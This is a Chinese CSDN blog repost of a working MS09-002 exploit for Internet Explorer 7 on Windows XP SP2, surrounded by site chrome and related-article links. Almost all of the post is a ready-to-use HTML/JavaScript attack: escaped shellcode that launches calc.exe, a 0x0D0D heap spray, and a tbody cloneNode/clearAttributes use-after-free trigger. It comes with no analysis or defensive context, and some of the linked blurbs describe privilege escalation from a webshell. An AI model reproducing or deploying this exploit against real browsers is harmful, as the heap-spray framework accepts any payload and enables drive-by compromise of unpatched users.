MS09-002 Internet Exploere 7.0 Exploit

最新推荐文章于 2022-08-07 11:32:43 发布
最新推荐文章于 2022-08-07 11:32:43 发布
阅读量901 收藏
点赞数
分类专栏: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tony_whu/article/details/13020887
版权 
<!--
MS09-002 Internet Exploere 7.0 Exploit
Modify by Friddy 2009.02.19 mail:qianyang@ssyeah.com
blog:www.friddy.cn
Tested under Windows XP sp2+IE 7.0
shellcode will popup the calc.exe
-->

<script language="JavaScript">
var shellcode=unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120
%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124
%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B
%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68
%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

var array = new Array();

var ls = 0x100000-(shellcode.length*2+0x01020);

var b = unescape("%u0D0D%u0D0D");
while(b.length<ls) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;

for(i=0; i<0xD0; i++) {
array[i] = lh + shellcode;
}

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script>
usertony
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS09-002 exploit 源码分析
liwei8703的专栏
11-16 1114
攀蟾折桂摄寰宇,摘星揽月御乾坤。踏云踩雾骋宵壤,驱风逐日闯天地。 ------泉哥MS09-002 exploit 源码分析 - [溢出研究]Tag:MS09-002exploit版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明http://riusksk.blogbus.com/logs/37734905.html刚拿到黑防样刊,先看了上面的一篇关于MS09-002漏洞分析的文章《Thingking in MS09-002》,略有感悟,因此记录一下,就当作学习笔记。 // MS09-002
RPC漏洞的通用分析方法(图)
瞎几把学
01-11 2756
 作者:Friddy一.工具准备1.IDA Pro Advanced 5.2(强大的静态逆向工具)2.HexRays(强大的可以将汇编代码转换为高质量的C代码的IDA插件)3.mIDA(极好的抽象RPC接口的IDA插件)二.找到溢出点1.补丁比较。(1)保留没有更新的文件到文件夹Old(2)打补丁,将更新后的文件放到文件夹New(3)使用“Darun Grim”等类似的补丁比较工具进行
360本地提权(Webshell下用)
weixin_33858485的博客
07-09 361
作者: friddy 在webshell下运行360test.exe成功后,3389到服务器,按5下shift,得到一个cmd附件地址:360up.rar密码friddy没加壳。。。直接F5下。。。调用了BREGDLL.dll的导出函数,然后利用了映像劫持的debugger。。。安装了shift后门。。有码有真相:预览源代码打印关于01 signed int __cdec...
360安全卫士本地提权漏洞的webshell利用程序
02-11 2761
不知道该说什么好了,以前拿了很多shell,一直懒得提权,一是没那个必要,二是提权太累了,三是服务器类型的肉鸡多了也没啥用。不过要是能让我一下子就成功提权,何乐而不为呢?<!--google_ad_client = "pub-5022607363067780";/* 300x250, 创建于 09-5-20 */google_ad_slot = "3601646429";g
提权学习笔记
Fly_鹏程万里
06-07 1415
WEB提权1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行c:\windows\temp\cookies\net1.exeuser2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp ,之后使用刚提权的用户登录进去就是system权限,再试试一般就可以了。3.cmd拒绝访问的话就自...
windows exploere.exe 已停止工作
xiegan110的博客
02-25 1159
1.这是我远程过去的报错提示 2.接着我们去寻找这个故障模块名称 3.找到目录并且粉粹这个玩意 4.ok了,搞定了!
PE文件-手工修改重定位表-WinHex-CFF Explorer
插件开发
08-07 1581
如果需要修改exe,dll等的二进制代码,遇到添加绝对地址时,需要将绝对地址的位置添加进重定位表,确保添加代码的正确。接着找到下一个表头位置,地址是3B72,复制整块数据,向后移动两个位置。这样添加一个表项的工作就已经完成。白色部分是可以修改的,灰色部分不能,由此可见,CFF Explorer是可以修改重定位表的,但是不能直接增加一个新的表单元及表项的。然后是增加一个表项,虚拟地址是3000,大小是12,目标地址是3200。先采用CFF Explorer打开目标文件,找到重定位表,如下图所示;...
api-explorer:API Explorer是SwaggerOpenAPI规范的实时文档客户端
05-13
API资源管理器 ... 可扩展:API Explorer提供基于插件的可扩展系统,使您可以控制UI的多个方面,与API端点的交互以及API规范。 API规范加载程序:它与Swagger(v1,v2)API规范预先捆绑在一起,但可以扩展以处理其他...
vscode-dotnet-test-explorer:适用于Visual Studio Code的.NET Core测试资源管理器
05-02
.NET Core测试资源管理器 特征 .NET Core的测试资源管理器 先决条件 已安装 NUnit和MSTest需要dotnet 版本> = 2.2.104,并以英语运行dotnet工具(有关详细信息,请参阅 )。 0.7.5的新功能 小型更新,使nunit和...
vscode-taskexplorer:运行和管理Visual Studio Code的任务
02-08
任务浏览器-从Visual Studio Code查看和运行任务描述在SideBar和/或Explorer中提供一个视图(或同时提供),以显示组织到树视图中的所有受支持任务,以及父任务文件节点,分组的节点和项目文件夹(适用于大型多根...
vim-ast-explorer:[WIP]用于vim的AST Explorer插件; 受https启发
05-01
vim-ast-explorer [WIP]用于vim的AST Explorer插件; 受启发。 到目前为止,仍处于实验阶段,因此请不要安装此插件。 适用于: @ babel / parser(巴比伦) 埃斯普里玛(Esprima) 橡子 ... 从文件跳转到AST节点 ...
jayboxyz#awesome-programming-skills#浏览器的工作原理1
07-25
主流的浏览器:Firefox (引擎: Gecko + SpiderMonkey)Internet Exploere (引擎: Trident + Chakra
文件上传下载的shellcode
tony的专栏
10-25 1520
由于个人职业发展的原因,以后可能不会再深入研究这方面的东西了,只会当作纯粹的兴趣爱好。 我最近都在研究WEB和浏览器安全,以及安全设计方面的工作。所以为了让这些烂在我硬盘里的东西能够更好的发挥作用,能够更加的open,我决定公开这些已经烂掉的东西,也算是对自己过去的一个交代。 shellcode是一项非常具有艺术性的工作,可以对shellcode做加密,可以自己在shellcode里实现 一个
webKit漏洞学习
tony的专栏
11-07 1482
webKit : https://labs.mwrinfosecurity.com/blog/2013/04/19/mwr-labs-pwn2own-2013-write-up---webkit-exploit/
gdb学习资料
tony的专栏
11-07 737
gdb 十分钟教程 gdb 详细
ActionScript 及 AVM 学习
tony的专栏
03-31 626
链接:http://blog.csdn.net/hgl868/article/details/8193185
JavaScript练手项目.zip
08-15
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无积分,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于收集和整理资料耗费时间的酬劳
【轨迹优化】基于matlab脉冲干扰下高超声速飞行器轨迹优化【含Matlab源码 7221期】.mp4
08-15
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
基于springboot的厨艺交流平台 源码+数据库(毕业设计)
最新发布
08-15
基于Vue.js和SpringBoot的厨艺交流平台是一个功能丰富的在线社区,旨在为烹饪爱好者提供一个分享和学习烹饪技巧的平台。该平台分为管理后台和用户网页端,支持管理员和普通用户两种角色。管理后台提供对菜谱分类、菜谱信息、食材信息、商品信息和美食日志模块的全面管理功能,包括添加、编辑、删除和查询等操作。用户网页端则为用户提供了一个友好的界面,可以浏览和搜索各种菜谱,查看食材和商品信息,发表自己的美食日志,与其他用户互动交流。整个平台采用现代化的前端技术和后端框架,保证了良好的用户体验和高效的数据处理能力。 录屏:https://www.bilibili.com/video/BV1uz42197zu 教程:https://space.bilibili.com/417412814/channel/collectiondetail?sid=2242844
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值